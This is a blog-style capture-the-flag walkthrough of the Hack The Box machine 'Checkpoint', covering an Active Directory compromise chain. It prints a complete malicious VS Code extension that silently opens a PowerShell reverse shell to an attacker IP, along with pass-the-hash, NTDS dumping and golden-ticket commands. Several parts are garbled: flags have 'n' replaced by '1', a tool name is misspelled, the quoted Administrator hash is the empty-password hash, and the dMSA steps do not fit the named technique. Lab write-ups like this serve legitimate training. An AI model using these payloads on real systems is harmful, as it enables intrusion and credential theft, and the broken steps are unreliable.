Listen to this Post
Introduction:
The Checkpoint machine on Hack The Box presents a sophisticated Windows Active Directory privilege escalation chain that mirrors real-world enterprise compromise scenarios. This medium-difficulty Windows Server 2025 environment challenges penetration testers to navigate through deleted object restoration, malicious VSIX extension exploitation, and advanced Active Directory attack techniques. What makes Checkpoint particularly valuable is its demonstration of how seemingly minor misconfigurations—such as writable deleted objects and backup access permissions—can cascade into complete domain compromise.
Learning Objectives:
- Master Active Directory enumeration techniques using BloodHound and bloodyad for identifying writable objects and privilege paths
- Understand CVE-2025-55319 VS Code malicious extension RCE and craft weaponized VSIX packages
- Execute CVE-2025-53779 BadSuccessor dMSA privilege escalation for service account impersonation
- Extract credentials from VM memory snapshots using VMkatz
- Develop a comprehensive post-exploitation methodology for Windows Active Directory environments
You Should Know:
1. Initial Reconnaissance and Attack Surface Mapping
The journey begins with thorough enumeration of the target’s attack surface. Checkpoint’s open ports reveal a fully functional Active Directory environment:
Fast port scan to identify open services nmap -p- --min-rate 5000 -T4 10.129.23.157 | grep open Detailed service enumeration on discovered ports nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.23.157 -oN services.nmap
Critical services include DNS (port 53), Kerberos (port 88), LDAP (ports 389, 636, 3268, 3269), SMB (ports 139, 445), and WinRM (port 5985). These services indicate a Windows domain controller, making Active Directory enumeration the primary focus.
With the provided credentials alex.turner / Checkpoint2024!, validate access:
Validate credentials against the domain nxc smb 10.129.23.157 -u alex.turner -p 'Checkpoint2024!' Enumerate SMB shares with authenticated access nxc smb 10.129.23.157 -u alex.turner -p 'Checkpoint2024!' --shares
The share enumeration reveals DevDrop with READ permissions—a VS Code extension storage share—and VMBackups with no current access but identified as an escalation target.
2. Deleted Object Discovery and Restoration
A critical misconfiguration emerges: the `alex.turner` account has WRITE access to deleted objects in Active Directory. This represents a significant security oversight, as deleted objects can be restored and their attributes modified.
Identify writable AD objects bloodyad --host 10.129.23.157 -d checkpoint.htb \ -u alex.turner -p 'Checkpoint2024!' get writable List deleted users in the domain bloodyad --host 10.129.23.157 -d checkpoint.htb \ -u alex.turner -p 'Checkpoint2024!' get deleted_users
The enumeration identifies a deleted user account `mark.davies` that can be restored. Restoration provides access to the DevDrop share with WRITE permissions:
Restore the deleted user account bloodyad --host 10.129.23.157 -d checkpoint.htb \ -u alex.turner -p 'Checkpoint2024!' restore_user mark.davies Verify DevDrop write access nxc smb 10.129.23.157 -u mark.davies -p 'RestoredPassword!' --shares
3. Weaponizing VSIX Extensions (CVE-2025-55319)
With WRITE access to the DevDrop share, the attacker can upload malicious VS Code extensions. CVE-2025-55319 enables Remote Code Execution through specially crafted VSIX packages.
The attack leverages VS Code’s extension installation mechanism—when a user opens a malicious extension, the embedded code executes with the user’s privileges.
Creating a Malicious VSIX Package:
// extension/package.json - Malicious VS Code Extension
{
"name": "checkpoint-exploit",
"displayName": "Checkpoint Exploit",
"version": "1.0.0",
"publisher": "checkpoint",
"engines": {
"vscode": "^1.74.0"
},
"activationEvents": [""],
"main": "./out/extension.js"
}
// extension/out/extension.js - Payload Execution
const vscode = require('vscode');
const { exec } = require('child_process');
function activate(context) {
// Reverse shell payload
const payload = 'powershell -1oP -1onI -W Hidden -Exec Bypass ' +
'-Command "$client=New-Object System.Net.Sockets.TCPClient("10.10.14.X",4444);' +
'$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};' +
'while(($i=$stream.Read($bytes,0,$bytes.Length)) -1e 0){' +
'$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);' +
'$sendback=(iex $data 2>&1 | Out-String );' +
'$sendback2=$sendback+"PS "+(pwd).Path+"> ";' +
'$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);' +
'$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"';
exec(payload, (error, stdout, stderr) => {
// Execution happens in background
});
}
function deactivate() {}
module.exports = { activate, deactivate };
Packaging and Uploading:
Install vsce tool npm install -g vsce Package the malicious extension vsce package Upload to DevDrop SMB share smbclient //10.129.23.157/DevDrop -U mark.davies <blockquote> put checkpoint-exploit-1.0.0.vsix exit
When a privileged user (ryan.brooks) opens the DevDrop share and installs the malicious extension, the reverse shell executes, providing initial foothold.
4. Establishing Persistence and Shell Stabilization
Upon receiving the reverse shell as ryan.brooks, establish a stable working environment:
On the target (reverse shell) whoami checkpoint\ryan.brooks Check user privileges net user ryan.brooks Enumerate groups net user ryan.brooks /domain Check for interesting files dir C:\Users\ryan.brooks\Desktop type C:\Users\ryan.brooks\Desktop\user.txt
For a more stable shell, use a PowerShell-based Meterpreter payload or establish WinRM access:
From attacker machine - Test WinRM access nxc winrm 10.129.23.157 -u ryan.brooks -p 'CapturedPassword' If WinRM is accessible evil-winrm -i 10.129.23.157 -u ryan.brooks -p 'CapturedPassword'
5. dMSA Privilege Escalation (CVE-2025-53779)
With `ryan.brooks` access, the next phase exploits CVE-2025-53779—the BadSuccessor dMSA (delegated Managed Service Account) privilege escalation vulnerability. This vulnerability allows creating a dMSA linked to a higher-privileged service account.
Understanding dMSA: Delegated Managed Service Accounts are designed to provide automatic password management for services. The vulnerability arises when an attacker with sufficient permissions can manipulate dMSA associations.
Enumerate existing dMSAs
Get-ADServiceAccount -Filter
Create a new dMSA linked to svc_deploy
New-ADServiceAccount -1ame "svc_deploy" -DNSHostName "dc01.checkpoint.htb" `
-PrincipalsAllowedToRetrieveManagedPassword "ryan.brooks"
Retrieve the dMSA password
$dmsa = Get-ADServiceAccount -Identity "svc_deploy"
$dmsaPassword = $dmsa | Get-ADServiceAccountPassword
Use the dmsa password to authenticate as svc_deploy
$cred = New-Object System.Management.Automation.PSCredential("checkpoint\svc_deploy", $dmsaPassword)
The exploitation grants access as svc_deploy, a service account with elevated permissions.
6. Backup Access Abuse and Credential Extraction
The `svc_deploy` account has membership in the BackupAccess group, enabling access to the VMBackups share. Virtual machine memory snapshots often contain sensitive credentials.
Access VMBackups share smbclient //10.129.23.157/VMBackups -U checkpoint\svc_deploy List available backups ls VM-Snapshot-2025-05-01.vmss VM-Snapshot-2025-05-01.vmsn Download memory snapshot get VM-Snapshot-2025-05-01.vmsn exit
Extracting Credentials with VMkatz:
VMkatz extracts credentials from VM memory snapshots:
Extract credentials from VM memory python3 vmklatz.py -f VM-Snapshot-2025-05-01.vmsn Alternatively, use volatility for memory analysis volatility -f VM-Snapshot-2025-05-01.vmsn --profile=Win10x64_20348 mimikatz
The extraction reveals the Administrator NTLM hash, enabling full domain compromise:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Pass-the-Hash Attack:
Use the extracted hash for pass-the-hash nxc smb 10.129.23.157 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 Access with evil-winrm using hash evil-winrm -i 10.129.23.157 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
7. Post-Exploitation and Persistence
Once Administrator access is achieved, establish persistence and extract final flags:
Extract root flag type C:\Users\Administrator\Desktop\root.txt Dump all domain hashes nxc smb 10.129.23.157 -u Administrator -H <hash> --1tds Create Golden Ticket for persistence mimikatz kerberos::golden /user:Administrator /domain:checkpoint.htb ` /sid:S-1-5-21-xxx /krbtgt:<krbtgt_hash> /id:500 /ptt
What Undercode Say:
- Methodology Over Memorization: The Checkpoint machine reinforces that successful penetration testing relies on systematic enumeration rather than memorized exploit chains. The hardest part isn’t exploitation—it’s knowing where to look.
-
The Cascading Effect of Misconfigurations: A single writable deleted object cascaded into full domain compromise. This demonstrates how seemingly minor Active Directory misconfigurations can create entire attack paths.
-
Real-World Relevance: The attack chain mirrors modern enterprise threats—VSIX extension abuse, dMSA manipulation, and VM memory extraction are all techniques observed in actual breaches.
-
Windows-Specific Skill Development: Checkpoint provides invaluable hands-on experience with Windows AD environments, complementing the predominantly Linux-focused HTB machines.
-
Patience and Persistence: The multi-stage attack requires methodical progression through each phase, reinforcing that rushing leads to missed opportunities.
Analysis: The Checkpoint machine stands as an exceptional learning tool for offensive security practitioners. Its Windows Server 2025 environment with Active Directory provides a realistic enterprise simulation. The exploitation chain—from deleted object restoration to VSIX RCE, dMSA escalation, and VM memory extraction—mirrors sophisticated APT techniques. The inclusion of recent CVEs (2025-55319 and 2025-53779) ensures relevance to current threat landscapes. For red teamers and penetration testers, mastering this machine develops critical skills in AD enumeration, lateral movement, and privilege escalation that translate directly to real-world engagements. The emphasis on credential extraction from backup artifacts highlights the often-overlooked risk of inadequate backup security.
Prediction:
+1 The techniques demonstrated in Checkpoint will become increasingly relevant as organizations continue migrating to hybrid AD environments, creating more attack surfaces.
+1 The VSIX extension attack vector will see increased attention from both security researchers and threat actors, prompting Microsoft to implement stricter extension signing requirements.
-1 Organizations that fail to audit deleted object permissions and dMSA configurations remain vulnerable to the cascading privilege escalation chain demonstrated in this machine.
-1 The reliance on VM memory snapshots for credential extraction highlights a critical gap in many organizations’ backup security strategies.
+1 Active Directory security training will increasingly incorporate realistic attack chains like Checkpoint, moving beyond theoretical knowledge to practical exploitation skills.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Vyankatesh Shinde – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
